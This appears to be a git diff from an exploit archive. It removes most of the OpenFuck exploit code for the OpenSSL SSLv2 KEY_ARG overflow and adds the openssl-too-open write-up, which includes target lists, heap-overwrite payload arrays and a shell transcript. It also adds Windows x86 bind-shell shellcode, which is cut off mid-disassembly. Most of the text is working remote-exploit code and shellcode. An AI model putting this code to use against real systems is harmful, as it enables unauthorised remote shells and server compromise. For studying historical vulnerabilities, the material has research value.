CIPHER-SPECS-LENGTH is not a multiple of 3\n"); - exit(1); - } - - found = 0; - for (end=p+cs_length; p < end; p += 3) { - if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80)) - found = 1; /* SSL CK RC4 128 WITH MD5 */ - } - - if (!found) { - printf("get server hello: Remote server does not support 128 bit RC4\n"); - exit(1); - } - - if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) { - printf("get server hello: CONNECTION-ID-LENGTH is too long\n"); - exit(1); - } - - /* The connection id is sent back to the server in the CLIENT FINISHED packet */ - ssl->conn_id_length = conn_id_length; - memcpy(ssl->conn_id, p, conn_id_length); -} - -/* Send a CLIENT MASTER KEY message to the server */ - -void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) { - int encrypted_key_length, key_arg_length, record_length; - unsigned char* p; - int i; - EVP_PKEY *pkey=NULL; - - unsigned char buf[BUFSIZE] = - "\x02" /* client master key message */ - "\x01\x00\x80" /* cipher kind */ - "\x00\x00" /* clear key length */ - "\x00\x40" /* encrypted key length */ - "\x00\x08"; /* key arg length */ - - p = &buf[10]; - - /* generate a 128 byte master key */ - for (i = 0; i < RC4_KEY_LENGTH; i++) { - ssl->master_key[i] = (unsigned char) (rand() >> 24); - } - - pkey=X509_get_pubkey(ssl->x509); - if (!pkey) { - printf("send client master key: No public key in the server certificate\n"); - exit(1); - } - - if (pkey->type != EVP_PKEY_RSA) { - printf("send client master key: The public key in the server certificate is not a RSA key\n"); - exit(1); - } - - /* Encrypt the client master key with the server public key and put it in the packet */ - encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING); - if (encrypted_key_length <= 0) { - printf("send client master key: RSA encryption failure\n"); - exit(1); - } - - p += encrypted_key_length; - - if (key_arg_overwrite) { - /* These 8 
bytes fill the key arg array on the server */ - for (i = 0; i < 8; i++) { - *(p++) = (unsigned char) (rand() >> 24); - } - /* This overwrites the data following the key arg array */ - memcpy(p, key_arg_overwrite, key_arg_overwrite_len); - - key_arg_length = 8 + key_arg_overwrite_len; - } - else { - key_arg_length = 0; /* RC4 doesn't use KEY-ARG */ - } - p = &buf[6]; - s2n(encrypted_key_length, p); - s2n(key_arg_length, p); - record_length = 10 + encrypted_key_length + key_arg_length; - send_ssl_packet(ssl, buf, record_length); - ssl->encrypted = 1; -} -void generate_key_material(ssl_conn* ssl) -{ - unsigned int i; - MD5_CTX ctx; - unsigned char *km; - unsigned char c='0'; - - km=ssl->key_material; - for (i=0; imaster_key,RC4_KEY_LENGTH); - MD5_Update(&ctx,&c,1); - c++; - MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH); - MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length); - MD5_Final(km,&ctx); - km+=MD5_DIGEST_LENGTH; - } -} -void generate_session_keys(ssl_conn* ssl) -{ - generate_key_material(ssl); - ssl->read_key = &(ssl->key_material[0]); - ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY)); - RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key); - - ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]); - ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY)); - RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key); -} -void get_server_verify(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - int len; - if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { - printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); - exit(1); - } - if (len != 1 + CHALLENGE_LENGTH) { - printf("get server verify: Malformed packet size\n"); - exit(1); - } - if (buf[0] != SSL2_MT_SERVER_VERIFY) { - printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]); - exit(1); - } - if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) { - printf("get server verify: Challenge strings don't match\n"); - exit(1); - } -} -void 
send_client_finished(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - buf[0] = SSL2_MT_CLIENT_FINISHED; - memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length); - send_ssl_packet(ssl, buf, 1+ssl->conn_id_length); -} -void get_server_finished(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - int len; - int i; - if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { - printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); - exit(1); - } - if (buf[0] != SSL2_MT_SERVER_FINISHED) { - printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]); - exit(1); - } - - if (len <= 112 /*17*/) { - printf("This server is not vulnerable to this attack.\n"); - exit(1); - } - cipher = *(int*)&buf[101]; - ciphers = *(int*)&buf[109]; - printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers); -} -void get_server_error(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - int len; - - if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) { - printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]); - exit(1); - } -} -void usage(char* argv0) -{ - int i; - printf(": Usage: %s target box [port] [-c N]\n\n", argv0); - printf(" target - supported box eg: 0x00\n"); - printf(" box - hostname or IP address\n"); - printf(" port - port for ssl connection\n"); - printf(" -c open N connections. (use range 40-50 if u dont know)\n"); - printf(" \n\n"); - printf(" Supported OffSet:\n"); - - for (i=0; i<=MAX_ARCH; i++) { - printf("\t0x%02x - %s\n", i, architectures[i].desc); - } - printf("\nFuck to all guys who like use lamah ddos. 
Read SRC to have no surprise\n"); - - exit(1); -} -int main(int argc, char* argv[]) -{ - char* host; - int port = 443; - int i; - int arch; - int N = 0; - ssl_conn* ssl1; - ssl_conn* ssl2; - - printf("\n"); - printf("*******************************************************************\n"); - printf("* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *\n"); - printf("*******************************************************************\n"); - printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n"); - printf("* #hackarena irc.brasnet.org *\n"); - printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n"); - printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n"); - printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n"); - printf("*******************************************************************\n"); - printf("\n"); - if ((argc < 3) || (argc > 6)) - usage(argv[0]); - sscanf(argv[1], "0x%x", &arch); - if ((arch < 0) || (arch > MAX_ARCH)) - usage(argv[0]); - host = argv[2]; - if (argc == 4) - port = atoi(argv[3]); - else if (argc == 5) { - if (strcmp(argv[3], "-c")) - usage(argv[0]); - N = atoi(argv[4]); - } - else if (argc == 6) { - port = atoi(argv[3]); - if (strcmp(argv[4], "-c")) - usage(argv[0]); - N = atoi(argv[5]); - } - srand(0x31337); - for (i=0; isock); - overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff); - overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff); - *(int*)&overwrite_next_chunk[156] = cipher; - *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12; - *(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */ - send_client_hello(ssl2); - get_server_hello(ssl2); - send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1); - generate_session_keys(ssl2); - get_server_verify(ssl2); - for (i = 0; i < ssl2->conn_id_length; i++) { - ssl2->conn_id[i] = (unsigned char) 
(rand() >> 24); - } - send_client_finished(ssl2); - get_server_error(ssl2); - printf("Spawning shell...\n"); - sleep(1); - sh(ssl2->sock); - close(ssl2->sock); - close(ssl1->sock); - return 0; -} -/* spabam: It isn't 0day */ - - - diff --git a/platforms/unix/remote/40347.txt b/platforms/unix/remote/40347.txt new file mode 100755 index 000000000..435903892 --- /dev/null +++ b/platforms/unix/remote/40347.txt 
@@ -0,0 +1,444 @@ +/* + * openssl-too-open.c - OpenSSL remote exploit + * Spawns a nobody/apache shell on Apache, root on other servers. + * + * by Solar Eclipse + * + * Thanks to Core, HD Moore, Zillion, Dvorak and Black Berry for their help. + * + * This code or any derivative versions of it may not be posted to Bugtraq + * or anywhere on SecurityFocus, Symantec or any affiliated site. + * + */ + +---------[ ./openssl-too-open ] + +openssl-too-open is a remote exploit for the KEY_ARG overflow in +OpenSSL 0.9.6d and older. It will give you a remote shell with the +priviledges of the server process (nobody when used against Apache, +root against other servers). + +Only Linux/x86 targets are supported. + +: openssl-too-open : OpenSSL remote exploit + by Solar Eclipse + +Usage: ./openssl-too-open [options] + -a target architecture (default is 0x00) + -p SSL port (default is 443) + -c open N apache connections before sending the shellcode (default is 30) + -m maximum number of open connections (default is 50) + -v verbose mode + +Supported architectures: + 0x00 - Gentoo (apache-1.3.24-r2) + 0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1) + 0x02 - Slackware 7.0 (apache-1.3.26) + 0x03 - Slackware 8.1-stable (apache-1.3.26) + 0x04 - RedHat Linux 6.0 (apache-1.3.6-7) + 0x05 - RedHat Linux 6.1 (apache-1.3.9-4) + 0x06 - RedHat Linux 6.2 (apache-1.3.12-2) + 0x07 - RedHat Linux 7.0 (apache-1.3.12-25) + 0x08 - RedHat Linux 7.1 (apache-1.3.19-5) + 0x09 - RedHat Linux 7.2 (apache-1.3.20-16) + 0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP) + 0x0b - RedHat Linux 7.3 (apache-1.3.23-11) + 0x0c - SuSE Linux 7.0 (apache-1.3.12) + 0x0d - SuSE Linux 7.1 (apache-1.3.17) + 0x0e - SuSE Linux 7.2 (apache-1.3.19) + 0x0f - SuSE Linux 7.3 (apache-1.3.20) + 0x10 - SuSE Linux 8.0 (apache-1.3.23-137) + 0x11 - SuSE Linux 8.0 (apache-1.3.23) + 0x12 - Mandrake Linux 7.1 (apache-1.3.14-2) + 0x13 - Mandrake Linux 8.0 (apache-1.3.19-3) + 0x14 - Mandrake Linux 8.1 (apache-1.3.20-3) + 0x15 - Mandrake 
Linux 8.2 (apache-1.3.23-4) + +Examples: ./openssl-too-open -a 0x01 -v localhost + ./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80 + + +---------[ ./openssl-scanner ] + +openssl-scanner scans a number of hosts for vulnerable OpenSSL +implementations. + +: openssl-scanner : OpenSSL vulnerability scanner + by Solar Eclipse + +Usage: ./openssl-scanner [options] + -i file with target hosts + -o output log + -a append to output log (requires -o) + -b check for big endian servers + -C scan the entire class C network the host belogs to + -d debug mode + -w N connection timeout in seconds + +Examples: ./openssl-scanner -d 192.168.0.1 + ./openssl-scanner -i hosts -o my.log -w 5 + + +---------[ Screenshots ] + +$ ./openssl-scanner -C 192.168.0.0 +: openssl-scanner : OpenSSL vulnerability scanner + by Solar Eclipse + +Opening 255 connections . . . . . . . . . . done +Waiting for all connections to finish . . . . . . . . . . . done + +192.168.0.136: Vulnerable + + +$ nc 192.168.0.1 80 +HEAD / HTTP/1.0 + +HTTP/1.1 200 OK +Date: Tue, 17 Sep 2002 17:47:44 GMT +Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b +Connection: close +Content-Type: text/html + + +./openssl-too-open -a 0x14 192.168.0.1 +: openssl-too-open : OpenSSL remote exploit + by Solar Eclipse + +: Opening 30 connections + Establishing SSL connections + +: Using the OpenSSL info leak to retrieve the addresses + ssl0 : 0x810b3a0 + ssl1 : 0x810b360 + ssl2 : 0x810b4e0 + +* Addresses don't match. + +: Opening 40 connections + Establishing SSL connections + +: Using the OpenSSL info leak to retrieve the addresses + ssl0 : 0x8103830 + ssl1 : 0x80fd668 + ssl2 : 0x80fd668 + +* Addresses don't match. 
+ +: Opening 50 connections + Establishing SSL connections + +: Using the OpenSSL info leak to retrieve the addresses + ssl0 : 0x8103830 + ssl1 : 0x8103830 + ssl2 : 0x8103830 + +: Sending shellcode +ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184 + Reading tag + Execution of stage1 shellcode succeeded, sending stage2 + Spawning shell... + +bash: no job control in this shell +bash-2.05$ +bash-2.05$ uname -a; id; w; +Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown +uid=48(apache) gid=48(apache) groups=48(apache) + 1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +bash-2.05$ + + +---------[ How Does openssl-too-open Work? ] + +It is important to understand the SSL2 handshake in order to successfully +exploit the KEY_ARG vulnerability. + +---/ Typical SSL2 Handshake + + + Client Server + + CLIENT_HELLO --> + + <-- SERVER_HELLO + +CLIENT_MASTER_KEY --> + + <-- SERVER_VERIFY + + CLIENT_FINISHED --> + + <-- SERVER_FINISHED + +The CLIENT_HELLO message contains a list of the ciphers the client supports, +a session id and some challenge data. The session id is used if the client +wishes to reuse an already established session, otherwise it's empty. + +The server replies with a SERVER_HELLO message, also listing all supported +ciphers and includes a certificate with its public RSA key. The server +also sends a connection id, which will later be used by the client to +verify that the encryption works. + +The client generates a random master key, encrypts it with the server's +public key and sends it with a CLIENT_MASTER_KEY message. This message +also specifies the cipher selected by the client and a KEY_ARG field, +which meaning depends on the specified cipher. For DES-CBC ciphers, the +KEY_ARG contains the initialization vector. + +Now both the client and the server have the master key and they can generate +the session keys from it. 
All messages from this point on are encrypted. + +The server replies with a SERVER_VERIFY message, containing the challenge +data from the CLIENT_HELLO message. If the key exchange has been successful, +the client will be able to decrypt this message and the challenge data returned +from the server will match the challenge data sent by the client. + +The client sends a CLIENT_FINISHED message with a copy of the connection id +from the SERVER_HELLO packet. It is now the server's turn to decrypt this +message and check if the connection id returned by the client matches the +connection it sent by the server. + +Finally the server sends a SERVER_FINISHED message, completing the handshake. +This message contains a session id, generated by the server. If the client +wishes to reuse the session later, it can send this session id with the +CLIENT_HELLO message. + + +---/ The KEY_ARG Buffer Overflow + +The bug is in ssl/s2_srvr.c, in the get_client_master_key() function. This +function reads a CLIENT_MASTER_KEY packet and processes it. It reads the +KEY_ARG_LENGTH value from the client and then copies that many bytes in an +array of a fixed size. This array is part of the SSL_SESSION structure. +If the client specifies a KEY_ARG longer than 8 bytes, the variables in the +SSL_SESSION structure can be overwritten with user supplied data. + +Let's look at the definition of this structure. + +typedef struct ssl_session_st + { + int ssl_version; /* what ssl version session info is + * being kept in here? */ + + /* only really used in SSLv2 */ + unsigned int key_arg_length; + unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH]; + int master_key_length; + unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; + /* session_id - valid? */ + unsigned int session_id_length; + unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; + /* this is used to determine whether the session is being reused in + * the appropriate context. 
It is up to the application to set this, + * via SSL_new */ + unsigned int sid_ctx_length; + unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; + + int not_resumable; + + /* The cert is the certificate used to establish this connection */ + struct sess_cert_st /* SESS_CERT */ *sess_cert; + + /* This is the cert for the other end. + * On clients, it will be the same as sess_cert->peer_key->x509 + * (the latter is not enough as sess_cert is not retained + * in the external representation of sessions, see ssl_asn1.c). */ + X509 *peer; + /* when app_verify_callback accepts a session where the peer's certificate + * is not ok, we must remember the error for session reuse: */ + long verify_result; /* only for servers */ + + int references; + long timeout; + long time; + + int compress_meth; /* Need to lookup the method */ + + SSL_CIPHER *cipher; + unsigned long cipher_id; /* when ASN.1 loaded, this + * needs to be used to load + * the 'cipher' structure */ + + STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */ + + CRYPTO_EX_DATA ex_data; /* application specific data */ + + /* These are used to make removal of session-ids more + * efficient and to implement a maximum cache size. */ + struct ssl_session_st *prev,*next; + } SSL_SESSION; + +It really looks better with VIM coloring. Anyway, we know the size of the +structure and it's allocated on the heap. The first thing that comes to +mind is to overwrite the next malloc chunk and then make the OpenSSL code +call free() on the SSL_SESSION structure. + +After we send a CLIENT_MASTER_KEY message, we'll read a SERVER_VERIFY packet +from the server and then we'll respond with a CLIENT_FINISHED message. +The server uses this the contents of this message to verify that the +key exchange succeeded. If we return a wrong connection id, the server +will abort the connection and free the SSL_SESSION structure, which is +exactly what we want. 
+ +We'll overwrite the KEY_ARG array with 8 random bytes and the following +string: + +unsigned char overwrite_next_chunk[] = + "AAAA" /* int master_key_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */ + "AAAA" /* unsigned int session_id_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; */ + "AAAA" /* unsigned int sid_ctx_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */ + "AAAA" /* unsigned int sid_ctx_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */ + "AAAA" /* int not_resumable; */ + "\x00\x00\x00\x00" /* struct sess_cert_st *sess_cert; */ + "\x00\x00\x00\x00" /* X509 *peer; */ + "AAAA" /* long verify_result; */ + "\x01\x00\x00\x00" /* int references; */ + "AAAA" /* int timeout; */ + "AAAA" /* int time */ + "AAAA" /* int compress_meth; */ + "\x00\x00\x00\x00" /* SSL_CIPHER *cipher; */ + "AAAA" /* unsigned long cipher_id; */ + "\x00\x00\x00\x00" /* STACK_OF(SSL_CIPHER) *ciphers; */ + "\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO_EX_DATA ex_data; */ + "AAAAAAAA" /* struct ssl_session_st *prev,*next; */ + "\x00\x00\x00\x00" /* Size of previous chunk */ + "\x11\x00\x00\x00" /* Size of chunk, in bytes */ + "fdfd" /* Forward and back pointers */ + "bkbk" + "\x10\x00\x00\x00" /* Size of previous chunk */ + "\x10\x00\x00\x00" /* Size of chunk, PREV_INUSE is set */ + +The "A" bytes don't affect the OpenSSL control flow. The other bytes must be +set to specific values to make the exploit work. For example, the peer and +sess_cert pointers must be NULL, because the SSL cleanup code will call +free() on them before it frees the SSL_SESSION structure. + +The free() call will write the value of the bk pointer to the memory +address in the fd pointer + 12 bytes. 
We'll put our shellcode address +in the bk pointer and we'll write it to the free() entry in the GOT +table. + +If you don't understand how freeing this malloc chunk overwrites the GOT +entry or don't know what the GOT table is, visit juliano's site at +http://community.core-sdi.com/~juliano/ and read some papers. + + +---/ Getting the Shellcode Address + +There is only one little problem. We need a place to put our shellcode +and we need the exact shellcode address. The trick is to use the +SERVER_FINISHED message. This message includes the session id, which +is read from the SSL_SESSION structure. The server reads session_id_length +bytes from the session_id[] array and sends them to the client. We can +overwrite the session_id_length variable and complete the handshake. +If session_id_length is long enough, the SERVER_FINISHED message will +include the contents of the SSL_SESSION structure. + +To get the contents of the session structure, we'll overwrite the +KEY_ARG array with 8 random bytes and the following string: + +unsigned char overwrite_session_id_length[] = + "AAAA" /* int master_key_length; */ + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */ + "\x70\x00\x00\x00"; /* unsigned int session_id_length; */ + +Now let's imagine the heap state when we send our connection request. +We have a heap, which contains some allocated chunks of memory and a +large 'top' chunk, covering all free memory. + +When the server receives the connection, it forks a child and the child +allocates the SSL_SESSION structure. If there has not been a signifficant +malloc/free activity, the fragmentation of the memory will be low and the +new chunk will be allocated from the beginning of the 'top' chunk. + +The next allocated chunk is a 16 bytes chunk which holds a +STACK_OF(SSL_CIPHER) structure. This chunk is also allocated from the +beginning of the 'top' chunk, so it's located right above the SSL_SESSION +structure. 
The address of this chunk is stored in the session->ciphers +variable. + +If we're lucky, the memory would look like this: + + | top chunk | + |-----------| +session->ciphers | 16 bytes | <- STACK_OF(SSL_CIPHER) structure +points here -> |-----------| + | 368 bytes | <- SSL_SESSION structure + |-----------| + +We can read the session->ciphers pointer from the SSL_SESSION structure +in the SERVER_FINISHED message. By subtracting 368 from it, we'll get +the address of the SSL_SESSION structure, and thus the address of +the data we've overwritten. + + +---/ fork() Is Your Friend + +We'll use the same buffer overflow to get the address of the shellcode +and to overwrite the malloc chunks. The problem is that we need to +know the shellcode address before we send it to the server. + +The only solution is to send 2 requests. The first request overwrites +session_id_length and we complete the handshake to get the SERVER_FINISHED +message. Then we adjust our shellcode and open a second connection +which we use to send it. + +If we're dealing with a forking server like Apache, the two children +will have an identical memory layout and malloc() will put the +session structure at the same address. Of course, life is never that +simple. Apache children can handle multiple requests, which would +change the memory allocation pattern of the two children we use. + +To guarantee that both children are freshly spawned, our exploit +will open a number of connections to the server before sending the +two important requests. These connection should use up all available +Apache children and force new ones to be spawned. + +If the server traffic is high, the exploit might fail. If the +memory allocation patterns are different, the exploit might fail. +If you have a wrong GOT address, the exploit will definitely fail. + + +---------[ How Does openssl-too-open Work? 
] + +openssl-scanner overflows the master_key_length, master_key[] and session_id_length +variables in the SSL_SESSION structure. The first two are uninitialized at this point, +so overwriting them has no effect on openssl. The first place where the session_id_length +variable is used after we overwrite it is in session_finish() (ssl/s2_srvr.c:847) + +memcpy(p,s->session->session_id, (unsigned int)s->session->session_id_length); + +This data is returned in the SERVER_FINISHED packet. openssl-scanner checks the length +of the data. If it matches the value we set session_id_length to, then the server is +exploitable. + +OpenSSL 0.9.6e and higher versions return +192.160.0.2: Server error: SSL2_PE_UNDEFINED_ERROR (0x00) after KEY_ARG data was sent. Server is not vulnerable. + +The updates that most vendors have put out backport the changes from 0.9.6e to 0.9.6b +or some other version of OpenSSL. They don't return an error like 0.9.6e. +The updated RedHat and Debian packages) would close the connection immediatelly +after they receive the oversized KEY_ARG data, causing openssl-scanner to report + +192.168.0.1: Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable. + +IIS servers exhibit the same behavior. + +IIS servers that don't have a certificate set up close the connection as soon as +they receive the CLIENT_HELLO packet. openssl-scanner reports this as + +192.168.0.2: Connection unexpectedly closed + + +/* EOF */ + + + + +http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40347.tar.gz (openssl-too-open.tar.gz) \ No newline at end of file diff --git a/platforms/linux/remote/764.c b/platforms/unix/remote/764.c similarity index 95% rename from platforms/linux/remote/764.c rename to platforms/unix/remote/764.c index bc83a3384..595a9f2b6 100755 --- a/platforms/linux/remote/764.c +++ b/platforms/unix/remote/764.c 
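Review bot: The last section of the added 40347.txt reuses the heading `---------[ How Does openssl-too-open Work? ]`, but the text under it describes openssl-scanner, so it should read `---------[ How Does openssl-scanner Work? ]`. The two archive links that close the file carry no checksum and the first is plain http, so a reader cannot confirm that the mirrored 40347.tar.gz is the author's original; a line such as `SHA-256: <digest of 40347.tar.gz>` next to the mirror link would close that gap. The sample output `192.160.0.2: Server error` in the same section looks like a typo for the 192.168.0.x addresses used everywhere else in the file.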
@@ -1,5 +1,5 @@
 /*
- * http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
+ * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
  *
  * OF version r00t VERY PRIV8 spabam
  * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
diff --git a/platforms/win_x86/shellcode/40352.c b/platforms/win_x86/shellcode/40352.c
new file mode 100755
index 000000000..240ea66f9
--- /dev/null
+++ b/platforms/win_x86/shellcode/40352.c
@@ -0,0 +1,519 @@ +/* + # Title : Windows x86 bind shell tcp shellcode + # Author : Roziul Hasan Khan Shifat + # Date : 08-09-2016 + # Tested On : Windows 7 Ultimate , Starter x86 +*/ + +//Note: This shellcode will only works on x86 + +/* +section .text + global _start +_start: + +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;PEB +mov eax,[eax+0xc] ;PEB.Ldr +mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList +lodsd +xchg esi,eax +lodsd +mov edi,[eax+0x10] ;kernel32.dll base address + + +mov ebx,[edi+0x3c] ;DOS->elf_anew +add ebx,edi ;PE HEADER +mov ebx,[ebx+0x78] +add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY + + +sub esp,32 +lea esi,[esp] + + +mov cx,660 + +mov edx,[ebx+0x1c] ;AddressOfFunctions +add edx,edi + +mov eax,[edx+ecx] +add eax,edi + +mov [esi],dword eax ;CreateProcessA() at offset 0 + +mov cx,1128 + +mov eax,[edx+ecx] +add eax,edi + +mov [esi+4],dword eax ;ExitProcess() at offset 4 + +;------------------------------------ +;finding base address of ws2_32.dll + +mov cx,3312 + +mov eax,[edx+ecx] +add eax,edi + +xor ecx,ecx +push 0x41416c6c +mov [esp+2],word cx +push 0x642e3233 +push 0x5f327377 + +lea ebx,[esp] + +push ebx +call eax + +;--------------------------- +mov edi,eax +;--------------------- +mov ebx,[edi+0x3c] ;DOS->elf_anew +add ebx,edi ;PE HEADER +mov ebx,[ebx+0x78] +add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY + +mov edx,[ebx+0x1c] ;AddressOfFunctions +add edx,edi + +xor ecx,ecx +mov cx,456 + +mov eax,[edx+ecx] +add eax,edi + +mov [esi+8],dword eax ;WSAStartup() at offset 8 + +mov cx,392 + +mov eax,[edx+ecx] +add eax,edi + +mov [esi+12],dword eax ;WSASocketA() at offset 12 + + +mov eax,[edx+4] +add eax,edi + +mov [esi+16],dword eax ;bind() at offset 16 + +mov eax,[edx+48] +add eax,edi + +mov [esi+20],dword eax ;listen() at offset 20 + +mov eax,[edx] +add eax,edi + +mov [esi+24],dword eax ;accept() at offset 24 + +mov eax,[edx+80] +add eax,edi + +mov [esi+28],dword eax ;setsockopt() at offset 28 +;------------------------------------------------- 
+;WSAStartup(514, &WSADATA) +mov cx,400 +sub esp,ecx + +lea ebx,[esp] + +mov cx,514 + +push ebx +push ecx + +call dword [esi+8] + + +;----------------------------------------- +;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL) + +xor ecx,ecx + +push ecx +push ecx +push ecx + +mov cl,6 +push ecx + +sub ecx,5 +push ecx + +inc ecx +push ecx + +call dword [esi+12] +;---------------------------- +mov edi,eax ;SOCKET + +;---------------------------------- +;setsockopt(sock,0xffff,4,&int l=1,int j=2) + +cdq +mov dl,2 + +push edx +dec edx + +push edx +lea ecx,[esp] + +mov dl,4 + +push ecx +push edx + +mov dx,0xffff +push edx +push edi + +call dword [esi+28] + + +;-------------------------------------------- +;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16); + +cdq + +push edx +push edx +push edx +push edx + +mov [esp],byte 2 +mov [esp+2],word 0x5c11 ;port 4444 + +lea ecx,[esp] +mov dl,16 + +push edx +push ecx +push edi + +call dword [esi+16] + +;-------------------------------- +;listen(SOCKET,1); +cdq +inc edx +push edx +push edi + +call dword [esi+20] +;----------------------------- +;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16); + +cdq +push edx +push edx +push edx +push edx +mov dl,16 +lea ecx,[esp] + + + +push edx +lea ebx,[esp] + +push ebx +push ecx +push edi + +call dword [esi+24] +;----------------------- +mov edi,eax ;CLIent socket +;----------------------- + +cdq +sub esp,16 +lea ebx,[esp] ;PROCESS_INFORMATION + +push edi +push edi +push edi +push edx + +push edx + +mov dl,255 +inc edx + +push edx +cdq + +push edx +push edx +push edx +push edx +push edx + +push edx +push edx +push edx +push edx +push edx + +mov dl,68 +push edx + +lea ecx,[esp] ;STARTUPINFOA + +cdq +push 0x41657865 +mov [esp+3],byte dl +push 0x2e646d63 + +lea eax,[esp] + +;--------------------------------------------- +;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION) + +push ebx +push ecx + +push edx +push edx +push edx + 
+inc edx +push edx +cdq + +push edx +push edx + +push eax +push edx + +call dword [esi] +;----------------------- +push eax +call dword [esi+4] + +*/ + + +/* + +Disassembly of section .text: + +00000000 <_start>: + 0: 31 c9 xor %ecx,%ecx + 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 6: 8b 40 0c mov 0xc(%eax),%eax + 9: 8b 70 14 mov 0x14(%eax),%esi + c: ad lods %ds:(%esi),%eax + d: 96 xchg %eax,%esi + e: ad lods %ds:(%esi),%eax + f: 8b 78 10 mov 0x10(%eax),%edi + 12: 8b 5f 3c mov 0x3c(%edi),%ebx + 15: 01 fb add %edi,%ebx + 17: 8b 5b 78 mov 0x78(%ebx),%ebx + 1a: 01 fb add %edi,%ebx + 1c: 83 ec 20 sub $0x20,%esp + 1f: 8d 34 24 lea (%esp),%esi + 22: 66 b9 94 02 mov $0x294,%cx + 26: 8b 53 1c mov 0x1c(%ebx),%edx + 29: 01 fa add %edi,%edx + 2b: 8b 04 0a mov (%edx,%ecx,1),%eax + 2e: 01 f8 add %edi,%eax + 30: 89 06 mov %eax,(%esi) + 32: 66 b9 68 04 mov $0x468,%cx + 36: 8b 04 0a mov (%edx,%ecx,1),%eax + 39: 01 f8 add %edi,%eax + 3b: 89 46 04 mov %eax,0x4(%esi) + 3e: 66 b9 f0 0c mov $0xcf0,%cx + 42: 8b 04 0a mov (%edx,%ecx,1),%eax + 45: 01 